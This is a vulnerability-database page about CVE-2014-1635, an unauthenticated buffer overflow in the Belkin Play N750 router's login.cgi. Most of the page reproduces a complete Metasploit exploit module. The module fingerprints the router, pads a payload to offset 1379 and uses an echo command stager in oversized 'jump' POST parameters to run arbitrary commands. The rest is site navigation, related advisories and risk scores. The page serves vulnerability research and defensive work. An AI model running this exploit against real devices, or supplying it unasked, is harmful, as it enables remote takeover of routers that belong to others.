Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Belkin Play N750 login.cgi Buffer Overflow

🗓️ 10 Mar 2015 15:49:51Reported by Marco Vaz <[email protected]>, Michael Messner <[email protected]>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 30 Views

Belkin Play N750 login.cgi Buffer Overflow in Router N750 routers. HTTP queries with long 'jump' parameters to /login.cgi execute arbitrary code

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Belkin n750 jump login Parameter Buffer Overflow Exploit
7 Nov 201400:00
zdt
Circl		CVE-2014-1635
6 Nov 201400:00
circl
Check Point Advisories		Belkin N750 Router Unauthenticated Remote Command Execution (CVE-2014-1635)
12 Nov 201400:00
checkpoint_advisories
CVE		CVE-2014-1635
12 Nov 201416:00
cve
Cvelist		CVE-2014-1635
12 Nov 201416:00
cvelist
Exploit DB		Belkin N750 - &#039;jump?login&#039; Remote Buffer Overflow
6 Nov 201400:00
exploitdb
exploitpack		Belkin N750 - jump?login Remote Buffer Overflow
6 Nov 201400:00
exploitpack
exploitpack		Belkin-n750-jump-login-Parameter
4 Jan 201516:26
exploitpack
NVD		CVE-2014-1635
12 Nov 201416:55
nvd
Packet Storm		Belkin Play N750 login.cgi Buffer Overflow
24 Mar 201500:00
packetstorm
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Belkin Play N750 login.cgi Buffer Overflow',
      'Description'    => %q{
        This module exploits a remote buffer overflow vulnerability on Belkin Play N750 DB
        Wireless Dual-Band N+ Router N750 routers. The vulnerability exists in the handling
        of HTTP queries with long 'jump' parameters addressed to the /login.cgi URL, allowing
        remote unauthenticated attackers to execute arbitrary code. This module was tested in
        an emulated environment, using the version 1.10.16.m of the firmware.
      },
      'Author'         =>
        [
          'Marco Vaz <mv[at]integrity.pt>', # Vulnerability discovery and msf module (telnetd)
          'Michael Messner <devnull[at]s3cur1ty.de>', # msf module with echo stager
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => ['linux'],
      'Arch'           => ARCH_MIPSLE,
      'References'     =>
        [
          ['CVE', '2014-1635'],
          ['EDB', '35184'],
          ['BID', '70977'],
          ['OSVDB', '114345'],
          ['URL', 'https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/'],
          ['URL', 'http://www.belkin.com/us/support-article?articleNum=4831']
        ],
      'Targets'        =>
        [
          [ 'Belkin Play N750 DB Wireless Dual-Band N+ Router, F9K1103,  firmware 1.10.16.m',
            {
              'Offset' => 1379,
            }
          ]
        ],
      'DefaultOptions' =>
        {
          'RPORT' => 8080
        },
      'DisclosureDate' => '2014-05-09',
      'DefaultTarget'  => 0))
      deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
  end

  def check
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => '/'
      })

      if res &&
        [200, 301, 302].include?(res.code) &&
        res.headers['Server'] &&
        res.headers['Server'] =~ /minhttpd/ &&
        res.body =~ /u_errpaswd/

        return Exploit::CheckCode::Detected
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Unknown
  end

  def exploit
    print_status("Accessing the vulnerable URL...")

    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
    end

    print_status("Exploiting...")
    execute_cmdstager(
      :flavor  => :echo,
      :linemax => 200
    )
  end

  def prepare_shellcode(cmd)
    shellcode = rand_text_alpha_upper(target['Offset'])
    shellcode << 'e' << cmd
    shellcode << "\n\n"
  end

  def execute_command(cmd, opts)
    shellcode = prepare_shellcode(cmd)
    begin
      res = send_request_cgi({
        'method'    => 'POST',
        'uri'       => '/login.cgi',
        'vars_post' => {
          'GO'   => '',
          'jump' => shellcode,
        }
      })
      return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Oct 2020 20:00Current
7.6High risk
Vulners AI Score7.6
CVSS 210
EPSS0.82871
belkinbuffer overflowrouter n750httpremoteunauthenticatedcve-2014-1635.
30